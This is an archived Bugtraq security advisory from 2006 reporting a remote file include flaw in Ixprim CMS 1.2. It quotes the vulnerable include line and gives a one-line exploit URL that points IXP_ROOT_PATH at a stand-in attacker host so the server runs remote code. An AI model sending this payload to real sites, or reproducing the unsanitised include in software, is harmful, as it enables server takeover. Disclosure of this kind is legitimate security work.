[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Ixprim CMS 1.2 Remote File Include Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Ixprim CMS 1.2 Remote File Include Vulnerability
From: vitux.manis@xxxxxxxxx
Date: 19 Nov 2006 09:06:47 -0000

Aplication : Ixprim CMS 1.2

URL 
:http://optusnet.dl.sourceforge.net/sourceforge/ixprim/ixprim-1.2-200603171800.zip

variable ixpts.class.php

include_once( IXP_ROOT_PATH.'/kernel/class/files.class.php' );

Exploit :  
http://www.vuln.com/kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://evilsite

vitux
 
#vitux.manis@xxxxxxxxx

Prev by Date: Telaen <= 1.1.0 Remote File Include Exploit
Next by Date: Rapid Classified v3.1 [multiple xss (get) & injection sql]
Previous by thread: Telaen <= 1.1.0 Remote File Include Exploit
Next by thread: Rapid Classified v3.1 [multiple xss (get) & injection sql]
Index(es):
- Date
- Thread